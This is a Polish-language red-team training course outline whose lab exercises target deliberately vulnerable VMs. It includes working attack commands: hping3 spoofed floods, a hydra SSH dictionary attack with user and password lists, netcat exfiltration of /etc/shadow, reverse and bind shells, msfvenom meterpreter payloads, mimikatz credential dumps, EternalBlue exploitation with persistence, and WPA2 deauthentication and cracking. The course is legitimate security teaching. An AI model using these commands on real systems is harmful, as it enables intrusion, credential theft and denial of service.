# Red team: Metody omijania zabezpieczeń - materiały dodatkowe

## Wprowadzenie

1. Co to jest Cyber Kill Chain?

[The Cyber Kill Chain](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html)

2. Co to jest macierz MITRE ATT&CK?

[MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/)

3. Co to jest model ISO/OSI?

4. Co to jest enkapsulacja? Jak działa w sieciach ethernet?

5. Co to jest domena rozgłoszeniowa?

6. Co to jest PKI?

7. Jak działa protokół DNS?

8. Jak działa TCP Handshake?


## Środowisko do ćwiczeń

![Diagram](diagram.png)


1. Kali Linux + DVWA

https://www.kali.org/tools/dvwa/

2. Metasploitable/3 Ubuntu version

Zdefiniowane środowisko - [Vagrantfile](Vagrantfile)


## 1. Podstawy użycia jednego z najbardziej popularnych snifferów - Wireshark


### Dekrypcja ruchu za pomocą Wireshark`a

Prezentacja - live demo

**Ćwiczenie 1: Analiza ruchu szyfrowanego HTTPS (użyjcie obu metod GUI i CLI)**

Proszę znaleźć hasło użytkownika "user" logującego się do usługi "https://192.168.56.10/drupal/"

[lab01 - pcap do analizy](labs/lab_sniffers/lab_01/https.pcap)

[lab01 - klucz prywatny](labs/lab_sniffers/lab_01/sniffers.pem)

**Ćwiczenie 2: Analiza ruchu szyfrowanego HTTPS przy użycie algorytmu Diffie-Hellmana**

```
Podpowiedź przy konfiguracji
export SSLKEYLOGFILE=/home/vagrant/sslkeyfile

```

[lab02 - pcap do analizy](labs/lab_sniffers/lab_02/https_dh.pcap)

[lab02 - ssl keylog](labs/lab_sniffers/lab_02/sslkey.log)


### TShark

thark z prostym filtrem:

```

tshark -o "tls.keys_list: 192.168.56.10,443,http,sniffers.pem" -r https.pcap -Y 'http'

```

thark z prostym filtrem i okreslonym formatem.

```

tshark -o "tls.keys_list: 192.168.56.10,443,http,sniffers.pem" -r https.pcap -Y 'http' -T json

tshark -o "tls.keys_list: 192.168.56.10,443,http,sniffers.pem" -r https.pcap -Y 'http.request.method == POST' -T json

```

Pomocne linki: 

1. https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/
2. https://wiki.wireshark.org/TLS
3. https://support.f5.com/csp/article/K50557518



Dodatkowe materiały:

1. Strona z przykładami złośliwego ruchu do analizy: https://www.malware-traffic-analysis.net/
2. https://www.wireshark.org/docs/relnotes/wireshark-4.0.0.html
3. https://wiki.wireshark.org/DisplayFilters.md


## 2. Rodzaje atakow Man In the Middle

Prezentacja - Live demo

### ARP Spoofing

Scope: Domena rozgłoszeniowa


Co to jest ARP?

"ARP is used by the network to convert IP addresses into MAC addresses"

Jak działa ARP Poisoning?

"Gratitious ARP is an ARP broadcast in which the source and destination IP addresses are the same. It used primarly by a host to inform the network about its IP address"

**Ćwiczenie 3. Spoofing ARP za pomoca narzędzia "ettercap"**

Proszę za pomoca narzędzia ettercap podsłuchać transmisje http

```

Weryfikacja: tcpdump -i eth1 -n

```

Mitigation: Disable IP Gratuitous ARPs,DARP (DYNAMIC ADDRESS RESOLUTION PROTOCOL),PORT SECURITY, Disable IP Proxy ARP

Pomocne linki: 

1. [Explained: Routers, Packets, Switches and Frames](https://nexgent.com/explained-routers-packets-switches-and-frames/)
2. [ARP Protocol - Data Encapsulation Series](https://www.youtube.com/watch?v=7gdesXcVxeQ)
3. [How does Proxy ARP work?](https://www.cisco.com/c/en/us/support/docs/ip/dynamic-address-allocation-resolution/13718-5.html)
4. [ARP spoofing using a man-in-the-middle Attack](https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/)
5. [ARP Spoofing](https://www.imperva.com/learn/application-security/arp-spoofing/)

### IP Spoofing

hping3 -1 --flood --rand-source 192.168.56.10 

hping3 -1 --flood -a 192.168.56.10 192.168.56.3

Przykład: [lab_ip - pcap do analizy](labs/lab_spoofing/lab_ip/ip_spoofing.pcap)

Mitigation: Disable IP Source Route,IP SOURCE GUARD, dhcp snooping

### DNS Spoofing

Prezentacja - Live demo

**Ćwiczenie 4. Spoofing DNS za pomoca narzędzia "ettercap". Pamiętaj o modyfikacji pliku "/etc/ettercap/etter.dns" !**

Przyklad: [lab_dns - pcap do analizy](labs/lab_spoofing/lab_dns/dns_spoofing.pcap)

Pomocne linki:

1. [What is DNS?](https://aws.amazon.com/route53/what-is-dns/)

### SSL Stripping

SSLStrip is a service that will transparently hijack an HTTP session, and every time there is an HTTPS redirect or an HTTPS link, it will turn that into its HTTP equivalent. This will only affect links and redirects, however. It will not force HTTP if the target actually types "https://" in the browser address bar. 

Pomocne linki:

1. [MITM/Wired/ARP Poisoning with Ettercap](https://charlesreid1.com/wiki/MITM/Wired/ARP_Poisoning_with_Ettercap)
2. [https://owasp.org/www-pdf-archive/SSL_Spoofing.pdf](https://owasp.org/www-pdf-archive/SSL_Spoofing.pdf)



### SSL/TLS interception

**Cwiczenie 5. Proszę za pomoca narzędzia ettercap + sslsplit podsłuchać transmisje https

[Rozwiazanie](labs/lab_spoofing/lab_ssl/exercise5_solution.md)

Przyklad: 

[lab_ssl - pcap do analizy](labs/lab_spoofing/lab_ssl/intercepted.pcap)

Pomocne linki:

1. https://www.roe.ch/SSLsplit
2. https://crt.sh/

### BGP Hijacking (ciekawostka)

Kradzież całego ASN`a!

[What Is BGP Hijacking?](https://www.cloudflare.com/en-gb/learning/security/glossary/bgp-hijacking/)


## Skanowanie sieci jako element hakowania

### Skanowanie pasywne

- shodan.io
- whois
- dig, nslookup (A/MX/TXT/NS records etc.)
- OSINT (linkedin, twitter, telegram, google, pastebin, github/gitlab, AWS S3 buckets etc.)
- Google Dorks (filetype:,intitle:,inurl:, site:, link: etc.)
- https://dnsdumpster.com/
- Oferty pracy
- dla zainteresowanych: recon-ng, maltego

### Skanowanie aktywne

- nmap
- scapy
- metasploit - use auxiliary/scanner/portscan/
- hping3
- traceroute/tracert
- ping (?)
- netcat
- Nessus, Qualys

Jaki jest cel skanowania?

- Identyfikacja "żywych" hostów w sieci
- Identyfikacja topologi sieci
- Identyfikacja portów sieciowych
- OS fingerprint
- Identyfikacji wersji usług uruchomionych na hostach
- :bangbang: Skanowanie podatności :bangbang:

**Ćwiczenie 6. Proszę zebrać informację o hostach w sieci a nastepnie zapisac do formatu txt**

W pliku maja sie znalezc informacje tj. Identyfikacja "żywych" hostów w sieci, Identyfikacja portów sieciowych, OS fingerprint,Identyfikacji wersji usług uruchomionych na hostach


**Ćwiczenie 7. Prosze za pomoca "Nmap Scriptin Engine (NSE)" wylistowac nagłówki HTTP skanowanej aplikacji a nastepnie zapisac do pliku txt**

```
┌──(root㉿kali)-[/usr/share/wordlists]
└─# locate *.nse


nmap --script-help=telnet* 

```

**Ćwiczenie 8. Zeskanuj serwer i wylistuj uzytkownikow za pomoca enum4linux. Nastepnie wykonaj atak slownikowy na usluge ssh**

```
--SSH--



1. Recon 



sudo nmap -O <adresacja IP metasplotable2> 



2. Zeskanuj naszą ofiarę. Naszą ofiarą jest Metasploitable2 (10.0.2.4)



sudo nmap  -sS -sV -O <IP metasplotable2> 



3. Zeskanuj port 22 



sudo nmap -sS -sV -sC -p22 <IP metasplotable2> 



4. Wylistuj userow na maszynie ofiary 



sudo enum4linux <IP metasplotable2> 



Oczyszczona lista poniżej:



games
nobody
bind
proxy
syslog
user
www-data
root
news
postgres
bin
mail
distccd
proftpd
dhcp
daemon 
sshd
man
lp
mysql
gnats
libuuid
backup 
msfadmin
telnetd
sys
klog
postfix
service
list
irc
ftp
tomcat55
sync
uucp



Kopiuj + wklej do pliku /usr/share/wordlists/myusers.txt



nano /usr/share/wordlists/myusers.txt > wklej > zapisz zmiany



5. Stwórz słownik haseł (pierwsze 14 słów + słowo "user")



https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-50.txt



123456
12345
123456789
password
iloveyou
princess
1234567
12345678
abc123
nicole
daniel
babygirl
monkey
lovely
user



Kopiuj + wklej do pliku /usr/share/wordlists/mypass.txt



nano /usr/share/wordlists/mypass.txt > wklej > zapisz zmiany



6. Wykonaj atak za pomocą:

1. hydra -L /usr/share/wordlists/myusers.txt -P /usr/share/wordlists/mypass.txt  ssh://<IP metasplotable2>  -t 4 

2. nmap --script=ssh-brute --script-args userdb=/usr/share/wordlists/myusers.txt, passdb=/usr/share/wordlists/mypass.txt -p22 <IP metasplotable2> 

3. metasploit "use scanner/ssh/ssh_login"


```
[labs/lab_hydra/hydra_requests.txt](labs/lab_hydra/hydra_requests.txt)

[labs/lab_hydra/hydra_responses.txt](labs/lab_hydra/hydra_responses.txt)

**Ćwiczenie 9. Uruchomienie netcata i pobranie /etc/passwd i /etc/shadow**

1. Zaloguj się wykorzystujac login i haslo z **cwiczenia 8**
2. Sprawdź wersje kernela Linux
3. pobierz exploit umożliwiający privilige escalation dla tej wersji Linux kernela
4. wykonaj privilige escalation
5. spakuj /etc/passwd i /etc/shadow/
6. uruchom nasłuchiwanie netcat`a na porcie 4444 ze spakowanym plikiem
7. pobierz plik netcatem na Kali linux
8. rozpakuj plik
9. Jak sie teraz nazywa konto root?

[Rozwiazanie](labs/lab_netcat/exercise9_solution.md)

**Ćwiczenie 10. Uruchomienie netcata jako reverse shell i nasluchiwanie ruchu dla aplikacji ***

Korzystajac z dostepu na uprawnienia root z **cwiczenia 9** zaloguj sie do hosta i uruchom ***reverse shell*** za pomoca polecenia netcat.

[Rozwiazanie](labs/lab_netcat/exercise10_solution.md)
 
**Ćwiczenie 11. Uruchomienie netcata jako bind shell**

Korzystajac z dostepu na uprawnienia root z **cwiczenia 9** zaloguj sie do hosta i uruchom ***bind shell*** za pomoca polecenia netcat. Nastepnie uruchom polecenie
"tcpdump -i eth0 port 80 > /var/www/dav/test.pcap" aby nasluchiwac ruchu http. Pobierz plik

[Rozwiazanie](labs/lab_netcat/exercise11_solution.md)

**Scapy** - dla zainteresowanych programowaniem w Pythonie :)

```
from scapy.all import *
lsc()
```

Pomocne linki:

1. [DirBuster](https://sekurak.pl/dirbuster-wykrywanie-zasobow-w-webaplikacjach/)
2. [scapy](https://scapy.net/)


## Łamanie haseł: rodzaje ataków na hasła, narzędzia do tzw. brute-force

**Zgadywanie haseł vs łamanie haseł**

- Zgadywanie haseł: brute-force, dictionary attack methods
- Łamanie haseł: łamanie zaszyfrowanych haseł/hashy

Czasem nie trzeba łamać ani zdadywać:

1. Hasła w clear-text`cie
2. Pass-the-hash technique
3. Pogoogle`ować


Pomocne linki:

- [Understanding /etc/passwd file fields](https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/)
- [Understanding /etc/shadow file fields and format](https://www.cyberciti.biz/faq/understanding-etcshadow-file/)


**Ćwiczenie 12** Łamanie haseł za pomocą John The Ripper

Korzystając z pobranych /etc/passwd i /etc/shadow z **cwiczenia 9** podaj hasło dla konta "sys"

Ścieżka do pliku wynikowego: /root/.john/john.pot

[Rozwiazanie](labs/lab_password_cracking/exercise12_solution.md)

**Ćwiczenie 13** Dump hashy z pamieci podrecznej za pomoca Mimikatz

Środowisko:

- Kali Linux
- Metasploitable 3 VM Win2k8

Uwaga!: Potrzebna maszyna Windows

1. Pobierz ze [strony Github](https://github.com/ParrotSec/mimikatz/blob/6375ee772e3c69a788eb6fe24e457390e06702bf/x64/mimikatz.exe)
2. Uruchom polecenie mimikatz.exe na serwerze Windows
3. Wykonaj polecenie sekurlsa::logonPasswords

Pomocne linki:

- https://github.com/ParrotSec/mimikatz
- https://github.com/ParrotSec/mimikatz/blob/6375ee772e3c69a788eb6fe24e457390e06702bf/x64/mimikatz.exe
- https://www.liquidweb.com/kb/how-to-install-and-use-mimikatz/

**Ćwiczenie 14** Ophcrack i łamanie haseł za pomocą Rainbow tables

## Metasploit oraz CVE

Pomocne linki:

- https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

### Wstęp do narzędzi

1. searchsploit
2. msfconsole
3. msfvenom

**Ćwiczenie 15** Wykonanie rekonesansu za pomocą narzędzia nmap + searchsploit


1. nmap [IP metasploitable] -sV -oX file.xml
2. searchsploit --nmap -w

**Ćwiczenie 16** Zbuduj własny reverse shell

List all modules: msfvenom --list all

- wersja x86

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[adres Kali linux] LPORT=[Port Kali Linux] -e x86/shikata_ga_nai -f exe -o meterpreter.exe


- wersja x64:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[adres Kali linux] LPORT=[Port Kali Linux] -f exe -o meterpreter64.exe


Pomocne linki:

- https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

**Ćwiczenie 17** Demo przed ćwiczeniem 18


**Ćwiczenie 18** Wykorzystanie podatności 'EternalBlue' SMB Remote Code Execution (MS17-010)

Środowisko:

- Kali Linux
- Metasploitable 3 VM Win2k8

Uwaga!: Potrzebna maszyna Windows

1. Wykorzystując framework metasploit wykonaj atak na serwer za pomocą podatności ETERNALBLUE
2. Zweryfikuj uprawnienia użytkownika 
3. Sprawdź wersje systemu
4. Zweryfikuj na jaka usługa działa na porcie 8585
5. Utwórz persystencje za pomoca pliku utworzonego w ćwiczeniu 16
6. Sprawdź jakie hasło ma użytkownik "sshd_server"
7. Zrób dump hash`y użytkowników
8. Złam hasła za pomocą narzędzia john the ripper. Jakie jest hasło dla użytkownika "c_three_pio"? (wykorzystaj wiedze z ćwiczenia 12)
9. polacz sie do hosta za pomoca tego uzytkownika

[Przykład rozwiazania](labs/lab_metasploit/exercise17_solution.md)

Pomocne linki:

- https://sekurak.pl/zdalny-exploit-na-ms17-010-dostepny-w-metasploit/
- https://sekurak.pl/wannacrypt-wana-decrypt0r-2-0-wanacry-jak-sie-chronic/
- https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
- https://www.hackingarticles.in/multiple-ways-to-persistence-on-windows-10-with-metasploit/
- https://darknetdiaries.com/episode/53/

**Ćwiczenie 19** Podobne ćwiczenie ale z Metasploitable 2 VM

Środowisko:

- Kali Linux
- Metasploitable 2 VM

Pomocne linki:

- https://dirtycow.ninja/


## Hakowanie Wi-Fi

Interefejs bezprzewodowy może działać w 4 trybach:

1. Master mode - działa jak Access Point
2. Ad-hoc mode - peer-to-peer
3. Managed mode - działa jak klient podłączonych do AP
4. Monitor mode - pasywnie przesyła zebrany ruch z interfejsu bezprzewodowego do OS`a

Pomocne linki:

- https://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/
- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
- https://kalitut.com/hacking-wpa2-passwords-with-hashcat/

**Ćwiczenie 20** Złamanie hasła WPA2-PSK za pomocą narzędzia aircrack-ng metodą słownikową

1. Przygotuj AP z 8 znakowym hasłem (8 cyfr)
2. Podłącz komputer/telefon/tablet do Hotspot`a
3. Ustaw adapter wifi w tryb słuchu (tryb monitor)

```
sudo airmon-ng start <interfejs karty>

```

Weyfikacja za pomocą komendy: 

```
iwconfig

```


4. Włącz nasłuch danych

```
sudo airodump-ng wlan0mon -c <kanał nasłuchiwany> -d <adres MAC Access Pointa> -w sda_test.pcap --output-format pcap
```

5. Za pomocą narzędzia aireplay-ng wykonaj deautentynkacje



```
sudo aireplay-ng -a <adres MAC Access Pointa> -c <adres MAC klienta podłączonego do Access Pointa> <interfejs karty w trybie monitor> -0 20
```

6. Złam hasło za pomocą 

```
sudo aircrack-ng -a 2 -b <adres MAC Access Pointa> -w /usr/share/wordlists/rockyou.txt sda_test.pcap-01.cap

```

[Przykład pliku do analizy narzędziem aircrack-ng](labs/lab_wifi/sda_test.pcap-01.cap)

**Ćwiczenie 21** Złamanie hasła WPA2-PSK za pomocą narzędzia hashcat metodą słownikową


1. Używając pliku z ćwiczenia 20 przekonweruj go na zgodny z narzędziem hashcat

[Przykład pliku](labs/lab_wifi/sda_test.pcap-01.cap)

```
hcxpcapngtool -o hash.hc22000 -E wordlist /home/vagrant/sda_test.pcap-01.cap
```

2. Uruchom narzędzie hashcat z metodą słownikową

```
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

```

**Ćwiczenie 21: Wariant 2** Złamanie hasła WPA2-PSK za pomocą narzędzia hashcat metodą brute-force

1. Używając poniższego pliku przekonweruj go na zgodny z narzędziem hashcat

[Przykład pliku](labs/lab_wifi/sda_lab-01.cap)

```
hcxpcapngtool -o hash_brute.hc22000 -E wordlist_brute /home/vagrant/sda_lab-01.cap

```

2. Uruchom narzędzie hashcat z metodą brute-force

```
hashcat -m 22000 hash_brute.hc22000 -a 3 ?d?d?d?d?d?d?d?d

```


## Anonimowość w sieci: sposoby anonimowości w sieci, Proxy, VPN, TOR

**Ćwiczenie 22** Konfiguracja SOCKS Proxy za pomocą przeglądarki firefox oraz klienta putty


[Przykład rozwiazania](labs/lab_proxy/exercise22_solution.md)


Pomocne linki:

- https://tails.boum.org/
- https://proton.me/
- https://signal.org/en/


## Podsumowanie

**Ćwiczenie 24 Znajdź API token w ruchu HTTP. Jakie hasło posiada użytkownik SDA_user?**

[Plik do analizy](labs/lab_sniffers/lab_03/http_api.pcap)

Przydatne linki: https://gchq.github.io/CyberChef/

**Ćwiczenie 25 [Dla zainteresowanych]: Analiza ruchu sieciowego infekcji Emotet**

https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/


**Ćwiczenie 26** Konfiguracja ProxyChains

1. Zainstaluj "apt install proxychains -y" na Kali
2. Uruchom socks proxy na innej dowolnej VMce
3. 
4. Dodaj serwer proxy do konfiguracji /etc/proxychains.conf

```
http x.x.x.x 80

```

Pomocne linki:

- https://www.freeproxylists.net/
- https://linuxhint.com/proxychains-tutorial/

**Ćwiczenie 27** Zabawy z metasploitable2 (wykorzystanie innej podatności)




Ciekawe artykuły:

- https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
- youtube "ippsec" channel
- https://github.com/Orange-Cyberdefense/GOAD
- 